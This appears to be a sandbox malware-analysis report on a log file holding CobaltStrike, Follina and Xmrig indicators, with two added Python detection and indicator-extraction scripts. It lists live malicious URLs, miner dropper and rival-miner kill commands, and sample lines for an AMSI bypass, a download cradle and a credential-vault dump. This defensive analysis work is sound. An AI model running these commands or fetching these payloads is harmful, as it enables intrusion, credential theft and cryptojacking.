
Windows Analysis Report
App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log

Overview

General Information

Sample Name: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log
Analysis ID: 743454
MD5: 988e0cb19fbc2cf5e3b9a33b205affd8
SHA1: 1b091e30aa366a5cdf582a81954893ac6201f769
SHA256: c289adee6ca95bb69f864497f32a8abbad65d20dccd06c4a1f6c3ef6d402693d

Detection

CobaltStrike, Follina CVE-2022-30190, Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected PowerShell decode and execute
Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Yara detected CobaltStrike Stager
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Yara detected AntiVM3
Found strings related to Crypto-Mining
Found Tor onion address
Queries the volume information (name, serial number etc) of a device
Yara signature match
May infect USB drives

Classification

  • System is w10x64
  • notepad.exe (PID: 5416 cmdline: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\Desktop\App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log MD5: BB9A06B8F2DD9D24C77F389D7B2B58D2)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log | SUSP_PowerShell_Caret_Obfuscation_2 | Detects powershell keyword obfuscated with carets | Florian Roth
  • 0x4724:$r1: p^o^w^e^r^s^h^e^l^l
  • 0x4724:$r2: p^o^w^e^r^s^h^e^l^l
App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log | Suspicious_PowerShell_WebDownload_1 | Detects suspicious PowerShell code that downloads from web sites | Florian Roth
  • 0x20dbf2:$s4: system.net.webclient).downloadfile("http
  • 0x8eb6:$s5: getstring([convert]::frombase64string(
  • 0x10c936:$s5: getstring([convert]::frombase64string(
  • 0x20328f:$s5: getstring([convert]::frombase64string(
  • 0x20cdf3:$s5: getstring([convert]::frombase64string(
  • 0x40e7d7:$s5: getstring([convert]::frombase64string(
App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log | PS_AMSI_Bypass | Detects PowerShell AMSI Bypass | Florian Roth
  • 0x40a8b2:$s1: .getfield('amsicontext',[reflection.bindingflags]'nonpublic,static').
App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
Source | Rule | Description | Author | Strings
00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp | SUSP_PowerShell_Caret_Obfuscation_2 | Detects powershell keyword obfuscated with carets | Florian Roth
  • 0x8e88:$r1: p^o^w^e^r^s^h^e^l^l
  • 0x8e88:$r2: p^o^w^e^r^s^h^e^l^l
00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security
00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp | INDICATOR_SUSPICIOUS_PWSH_PasswordCredential_RetrievePassword | Detects PowerShell content designed to retrieve passwords from host | ditekSHen
  • 0x81c9d4:$namespace: windows.security.credentials.passwordvault
  • 0x212ac8:$method1: retrieveall()
  • 0x212af8:$method2: .retrievepassword()
Process Memory Space: notepad.exe PID: 5416 | SUSP_PowerShell_Caret_Obfuscation_2 | Detects powershell keyword obfuscated with carets | Florian Roth
  • 0x37494a:$r1: p^o^w^e^r^s^h^e^l^l
  • 0x37494a:$r2: p^o^w^e^r^s^h^e^l^l
No Sigma rule has matched
No Snort rule has matched
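Every detection above is a static string match against the contents of the .log file (and against notepad.exe's memory after it loaded that file); the only process in the tree is notepad.exe and no Sigma or Snort rule fired, so the score reflects what the log contains, not anything it did. Because the hits are plain substrings, they are easy to reproduce in a triage script. The following Python is an added example and is not part of the Joe Sandbox report or of the rule authors' code: it scans a buffer for the same strings the report shows under SUSP_PowerShell_Caret_Obfuscation_2, Suspicious_PowerShell_WebDownload_1, PS_AMSI_Bypass and INDICATOR_SUSPICIOUS_PWSH_PasswordCredential_RetrievePassword, and it undoes cmd.exe caret escaping so that `p^o^w^e^r^s^h^e^l^l` is recognised as `powershell`. The rule names are reused as labels only (the real rules carry more strings and conditions than this subset), and the sample buffer is constructed for the example.

```python
import re

# String checks taken from the matches the report lists, keyed by the rule that
# reported them. Labels for this example only: the real rules have more strings and
# extra conditions, so this is a subset, not a re-implementation.
SIGNATURES = {
    "SUSP_PowerShell_Caret_Obfuscation_2": [
        ("$r1", r"p\^o\^w\^e\^r\^s\^h\^e\^l\^l"),
    ],
    "Suspicious_PowerShell_WebDownload_1": [
        ("$s4", r'system\.net\.webclient\)\.downloadfile\("http'),
        ("$s5", r"getstring\(\[convert\]::frombase64string\("),
    ],
    "PS_AMSI_Bypass": [
        ("$s1", r"\.getfield\('amsicontext',\[reflection\.bindingflags\]'nonpublic,static'\)\."),
    ],
    "INDICATOR_SUSPICIOUS_PWSH_PasswordCredential_RetrievePassword": [
        ("$namespace", r"windows\.security\.credentials\.passwordvault"),
        ("$method1", r"retrieveall\(\)"),
        ("$method2", r"\.retrievepassword\(\)"),
    ],
}
COMPILED = {
    rule: [(ident, re.compile(pat, re.IGNORECASE)) for ident, pat in strings]
    for rule, strings in SIGNATURES.items()
}


def uncaret(s: str) -> str:
    """Undo cmd.exe caret escaping: '^x' becomes 'x' and '^^' becomes '^'.
    cmd strips the caret before the command line reaches PowerShell, which is
    why p^o^w^e^r^s^h^e^l^l still launches powershell.exe."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "^" and i + 1 < len(s):
            out.append(s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def reveals_powershell(line: str) -> bool:
    """True when 'powershell' only appears once caret escapes are removed."""
    return "powershell" in uncaret(line).lower() and "powershell" not in line.lower()


def scan(buf: str):
    """Return (rule, string_id, offset, matched_text) for every hit, sorted by
    offset; all strings are matched case-insensitively, as in the report."""
    hits = []
    for rule, strings in COMPILED.items():
        for ident, rx in strings:
            for m in rx.finditer(buf):
                hits.append((rule, ident, m.start(), m.group(0)))
    return sorted(hits, key=lambda h: h[2])


def report(hits):
    """Format hits the way the report prints them: 0xOFFSET:$id: string."""
    return [f"{rule}  0x{off:x}:{ident}: {text}" for rule, ident, off, text in hits]


# Constructed sample buffer for this example; it is not content from the analysed file.
SAMPLE = "\n".join([
    "cmd /c p^o^w^e^r^s^h^e^l^l -nop -w hidden -e SQBFAFgA",
    '(New-Object System.Net.WebClient).DownloadFile("http://example.invalid/a.dat","$env:TEMP\\a.dat")',
    "[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($b))",
    "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
    ".GetField('amsiContext',[Reflection.BindingFlags]'NonPublic,Static').SetValue($null,[IntPtr]::Zero)",
    "(New-Object Windows.Security.Credentials.PasswordVault).RetrieveAll() | % { $_.RetrievePassword(); $_ }",
    "echo plain text with no indicators",
])

if __name__ == "__main__":
    for line in report(scan(SAMPLE)):
        print(line)
    print("caret-hidden powershell:", reveals_powershell(SAMPLE.splitlines()[0]))
```

The caret trick works because cmd.exe consumes `^` as an escape before the command line reaches PowerShell, so a string rule has to match the escaped form while process-creation telemetry shows the clean one; checking both, as `reveals_powershell` does, avoids missing either. Offsets are printed in the same `0x...:$id:` style as the report so the output can be compared directly against the listed matches.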

AV Detection

Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log; Virustotal: Detection: 16%
Source: http://www.bonusesfound.ml/update/index.php; Avira URL Cloud: Label: malware
Source: http://shgshgwsdynationalobjindustrialat18ygs.duckdns.org/receipt/invoice_202121.doc; Avira URL Cloud: Label: malware
Source: https://www.sputnikradio.net/radio/news/; Avira URL Cloud: Label: malware
Source: http://usa-national.info/gpu/band/grumble.dot; Avira URL Cloud: Label: malware
Source: http://192.210.240.8/doc_document/188.doc; Avira URL Cloud: Label: malware
Source: https://tph786.com/sale/images/avatar/; Avira URL Cloud: Label: phishing
Source: http://kec-rupit.muratarakab.go.id/si/excelz/index.php?email=; Avira URL Cloud: Label: phishing
Source: https://blackberryizm.com/frontend/assets/images/favico/report-fedex.php; Avira URL Cloud: Label: phishing
Source: http://outfish.bounceme.net/outl.dot; Avira URL Cloud: Label: malware
Source: http://ppaauuaa11232.cc/dlx5rc.dotm; Avira URL Cloud: Label: malware
Source: https://tpow.zeroworld.xyz/home/application/views/sistem/notifikasi/usqg66westx.php; Avira URL Cloud: Label: phishing
Source: http://windowsdefendergateway.duckdns.org/documents.doc; Avira URL Cloud: Label: malware
Source: http://83.166.246.59/sgz2/rejoice/lowered.dot; Avira URL Cloud: Label: malware
Source: http://198.23.156.247/receipt/receipt.doc; Avira URL Cloud: Label: malware
Source: http://192.3.152.171/; Avira URL Cloud: Label: malware
Source: https://hide.link/lfspz; Avira URL Cloud: Label: phishing
Source: http://103.167.90.69/receipt/inv_126776.wbk; Avira URL Cloud: Label: malware
Source: http://kitten-268.frge.io/article.html; Avira URL Cloud: Label: malware
Source: http://usb.mine.nu/c.sh-o/users/shared/c.sh; Avira URL Cloud: Label: phishing
Source: http://49.234.67.167/; Avira URL Cloud: Label: malware
Source: http://filecopying.xyz/update/kbp08x; Avira URL Cloud: Label: malware
Source: http://media.vitkvitk.com/xmlstatic/ads/videoplaza/vittalia.html?df=; Avira URL Cloud: Label: malware
Source: http://3.104.223.22/dhl/receipt.doc; Avira URL Cloud: Label: malware
Source: http://shdjhgftyhgjklolkjio.dns.navy/bcz/document.doc; Avira URL Cloud: Label: malware
Source: https://pigeonious.com/img/; Avira URL Cloud: Label: malware
Source: http://swipermachinereview.xyz/wp-includes/t3ow4kf0p0q8oo/; Avira URL Cloud: Label: malware
Source: http://103.167.93.37/invoice/invoice_000499000049.wbk; Avira URL Cloud: Label: malware
Source: https://rawcdn.githack.net/up.php?key=5; Avira URL Cloud: Label: malware
Source: https://hosteriaestilonorte.com.ar/admins/uzie/actions.php; Avira URL Cloud: Label: phishing
Source: http://83.166.246.59/ua-lt98brkc2/perform/luck/; Avira URL Cloud: Label: malware
Source: http://yourcontents.xyz/0758/0806pn; Avira URL Cloud: Label: phishing
Source: http://pretence77.glorious.nonima.ru/elenapc/principles/nearly.mp3; Avira URL Cloud: Label: malware
Source: http://thrprivatecloudshareandfileprotectagent.duckdns.org/receipt/invoice_651254.doc; Avira URL Cloud: Label: malware
Source: https://teachon.aerialview.lk/systemdemo/uploads/addons/__macosx/live-class/f2u4p7u3jk.php; Avira URL Cloud: Label: malware
Source: http://false.grafitto.ru/dch00-01/rehearsal.dot; Avira URL Cloud: Label: malware
Source: https://office.michiganappellateblog.com/soft.dll; Avira URL Cloud: Label: malware
Source: http://103.167.90.177/shpdocument/invc_0098008.wbk; Avira URL Cloud: Label: malware
Source: https://bb.realestateprivateportfolio.com/img/; Avira URL Cloud: Label: malware
Source: http://www.comeinbaby.com/updateerror/fiif; Avira URL Cloud: Label: malware
Source: http://209.127.20.13/b44u8j.dotm; Avira URL Cloud: Label: malware
Source: http://lump.semara.ru/dch00-01/counter/nearest/; Avira URL Cloud: Label: malware
Source: http://172.245.119.43/recept/34.doc; Avira URL Cloud: Label: malware
Source: http://thomastongrealestate.com/skywkc/3415201.pnga; Avira URL Cloud: Label: malware
Source: https://ab.v-mail.online/?e=; Avira URL Cloud: Label: phishing
Source: https://lidamtour.com/masivo/file/kmshost/; Avira URL Cloud: Label: malware
Source: http://www.bonusesfound.ml/update/index.php; Virustotal: Detection: 10%

Exploits

Source: Yara match; file source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log, type: SAMPLE
Source: Yara match; file source: 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Bitcoin Miner

Source: Yara match; file source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log, type: SAMPLE
Source: Yara match; file source: 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: Process Memory Space: notepad.exe PID: 5416, type: MEMORYSTR
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: c .conffichmod+x/tmp/httpd.conf/tmp/httpd.conf-b-acryptonight-ostratum+tcp://xmr.crypto-pool.fr:443
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: j grep-vgrep|grep"xmr.crypto-pool.fr:3333"|awk'{print$2}'|xargskill-9psauxf|grep-vgrep|grep"monerohash.com
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: d grep"mine.moneropool.com"|awk'{print$2}'|xargskill-9psauxf|grep-vgrep|grep"xmr.crypto-pool.fr:8080
Source: Binary string: )9 /!#SCPT:Trojan:PowerShell/Bumblebee.PDB04LNK!MTB; source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mpengine.pdb OGPS; source: notepad.exe, 00000000.00000002.608934300.000001CF7AD07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /!#SCPT:Trojan:PowerShell/Bumblebee.PDB04LNK!MTB; source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /!#SCPT:Trojan:PowerShell/Bumblebee.PDB04LNK!MTB; source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: b [autorun]
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: b .aziamdescoperit,sianumeautorun.inf.incsiind.inc:[autorun];;open=uksjhr.exe;qkkvolggsbvrgecqsxac
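The miner strings above (a dropper that marks `/tmp/httpd.conf` executable and runs it against `stratum+tcp://xmr.crypto-pool.fr:443`, then kills rival miners by grepping `ps` output for other pool hosts) and the URL list in the Networking section are the indicators a responder would want to pull out of this file. The Python below is an added example, not part of the Joe Sandbox report: it extracts pool endpoints both from the `-o stratum+tcp://` argument and from the `grep "host:port"` kill loop, collects http(s) URLs and .onion hosts, and defangs everything for sharing. The sample text is constructed from the report's strings with the whitespace the sandbox display stripped put back; it is not the literal content of the analysed file.

```python
import re
from urllib.parse import urlsplit

# Constructed for this example from the strings the report lists, with the whitespace
# the sandbox display stripped put back; not the literal bytes of the analysed file.
SAMPLE = "\n".join([
    "chmod +x /tmp/httpd.conf; /tmp/httpd.conf -b -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443",
    "ps auxf | grep -v grep | grep \"xmr.crypto-pool.fr:3333\" | awk '{print $2}' | xargs kill -9",
    "ps auxf | grep -v grep | grep \"monerohash.com\" | awk '{print $2}' | xargs kill -9",
    "ps auxf | grep -v grep | grep \"mine.moneropool.com\" | awk '{print $2}' | xargs kill -9",
    "<b>http://decoderswlezrsa7.onion</b> in tor browser and follow the instructions.",
    "http://www.bonusesfound.ml/update/index.php",
    "http://192.210.240.8/doc_document/188.doc",
])

STRATUM_RE = re.compile(r"stratum\+(?:tcp|ssl)://([\w.-]+):(\d{1,5})", re.I)
# Kill loops for rival miners name the rival pool inside grep "...": host or host:port.
GREP_TARGET_RE = re.compile(r'grep\s+"([\w-]+(?:\.[\w-]+)+(?::\d{1,5})?)"')
URL_RE = re.compile(r"https?://[^\s\"'<>|]+", re.I)
# Command-line fragments typical of xmrig-style miners.
MINER_MARKERS = ("-a cryptonight", "--algo", "-o stratum", "--donate-level")


def extract_pools(text):
    """Return {(host, port_or_None)} for every mining pool the text names."""
    pools = set()
    for host, port in STRATUM_RE.findall(text):
        pools.add((host.lower(), int(port)))
    for target in GREP_TARGET_RE.findall(text):
        host, _, port = target.partition(":")
        pools.add((host.lower(), int(port) if port else None))
    return pools


def extract_urls(text):
    """Unique http(s) URLs, trailing punctuation trimmed."""
    return sorted({u.rstrip(".,;)") for u in URL_RE.findall(text)})


def defang(url):
    """hxxp://host[.]tld/path form, safe to paste into tickets and chat."""
    scheme, sep, rest = url.partition("://")
    host, slash, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + sep + host.replace(".", "[.]") + slash + path


def summarize(text):
    """Miner verdict plus pools, .onion hosts and defanged URLs found in the text."""
    urls = extract_urls(text)
    onion = sorted({h for h in (urlsplit(u).hostname or "" for u in urls) if h.endswith(".onion")})
    lowered = text.lower()
    return {
        "miner": any(marker in lowered for marker in MINER_MARKERS),
        "pools": sorted(extract_pools(text), key=lambda p: (p[0], p[1] or 0)),
        "onion": onion,
        "urls": [defang(u) for u in urls],
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE).items():
        print(f"{key}: {value}")
```

Pool endpoints taken from the kill loop are worth keeping alongside the primary one: a miner that competes with other miners has enumerated the pools it expects to find on the host, and those names are useful block-list and hunt entries regardless of whether this particular sample ever connected to them.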

Networking

Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: b <b>http://decoderswlezrsa7.onion</b>intorbrowserandfollowtheinstructions.<br><br>yourpersonalid:
Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log; String found in binary or memory: <b>http://decoderswlezrsa7.onion</b>intorbrowserandfollowtheinstructions.<br><br>yourpersonalid:
Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log; String found in binary or memory: b<b>http://decoderswlezrsa7.onion</b>intorbrowserandfollowtheinstructions.<br><br>yourpersonalid:
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: m targetpath="http://www.youtube.com/t3chyy"ourllink.savesetourllink=wshshell.createshortcut("fucked equals www.youtube.com (Youtube)
Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log; String found in binary or memory: http://103.133.106.72/ini/................wbk
Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log; String found in binary or memory: http://103.155.83.184/invoice/inv_3452323.wbk
Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log; String found in binary or memory: http://103.155.83.184/wireadv/invc_9800232.wbk
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://103.167.84.138/receipt/invc_0000560001.wbk
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://103.167.90.177/shpdocument/invc_0098008.wbk
Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log; String found in binary or memory: http://103.167.90.69/receipt/inv_126776.wbk
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://103.167.93.12/invoice/invoice_000300020.wbk
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://103.167.93.37/invoice/invoice_000499000049.wbk
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://103.170.255.140/documents/invc_0044050506000.wbk
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://103.171.0.220/receipt/invoice_008789000.wbk
Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log; String found in binary or memory: http://106.15.186.165/mstdx86.html(x-usc:http://106.15.186.165/mstdx86.html
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://107.172.130.145/
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://107.173.143.102/hhh/invc_005400005400.wbk
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://107.173.219.125/msoffice/msoffice.doc
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://117.48.146.246:8008/exploit.htm
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://13.234.135.58/loadingupdate.html
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://172.245.119.43/
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://172.245.119.43/recept/34.doc
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp, App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log; String found in binary or memory: http://185.172.110.217/kvsn/image.png
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://185.173.34.107/office/document.doc
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://185.22.153.9/desktop-u2u8a6r/nature/
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://185.22.153.9/desktop-u2u8a6r/nature/prey.dot
Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log; String found in binary or memory: http://185.222.58.102/invoice/inv_9002343.wbk
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://188.127.254.159/
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://192.210.219.10/
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://192.210.219.10/office/doc13/dc.doc
Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log; String found in binary or memory: http://192.210.240.8/
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://192.210.240.8/doc_document/188.doc
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://192.210.240.8/inv/323.doc?
Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log; String found in binary or memory: http://192.227.168.187/receipt/office_
Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log; String found in binary or memory: http://192.3.110.133/
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://192.3.110.133/dhl/125.doc
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://192.3.110.172/documents/invc_009030009.wbk
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://192.3.122.162/
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp, App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log; String found in binary or memory: http://192.3.141.173/word/
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://192.3.152.171/
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://193.169.253.204/
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://195.123.210.174/
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://198.12.107.11/....document........document/
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://198.12.91.160/
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://198.23.156.247/receipt/receipt.doc
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://198.23.207.54/
Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log; String found in binary or memory: http://2.56.59.196:8000/index.html
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://20.51.227.181/layout20223acb.dotm
Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log; String found in binary or memory: http://202.55.132.141/invoice/inv_009000987.wbk
Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log; String found in binary or memory: http://202.55.132.141/receipt/inv_2331122.wbk
Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log; String found in binary or memory: http://209.127.20.13/b44u8j.dotm
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://209.141.40.190/xms
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://209.141.40.190/xms/tmp/xms
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://213.109.192.61/
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://217.195.153.111/
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://23.29.125.210/
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://23.94.174.158/document/invc_00000023444.wbk
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://23.95.122.25/.-
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://23.95.52.140/
Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log; String found in binary or memory: http://23.95.52.140/win32/documentdoc
Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log; String found in binary or memory: http://23.95.85.171/
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://3.104.223.22/dhl/receipt.doc
Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log; String found in binary or memory: http://3.134.125.175:9999/index.html
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://3.139.50.24/prv.php?id=
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://3.70.225.229/inv/inv.doc?
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://45.133.1.53/2x/img_05421065.exe
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://45.144.31.232/
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://45.150.67.233/
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://45.67.229.164:7497/payload.html
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://45.76.53.253/1.html
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://45.76.53.253/1.htmlhttp://45.76.53.253/1.html
Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log; String found in binary or memory: http://49.234.67.167/
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://80.92.205.91/
Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://82.118.21.70/
Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log; String found in binary or memory: http://83.166.242.164/desktop-st7lsde/
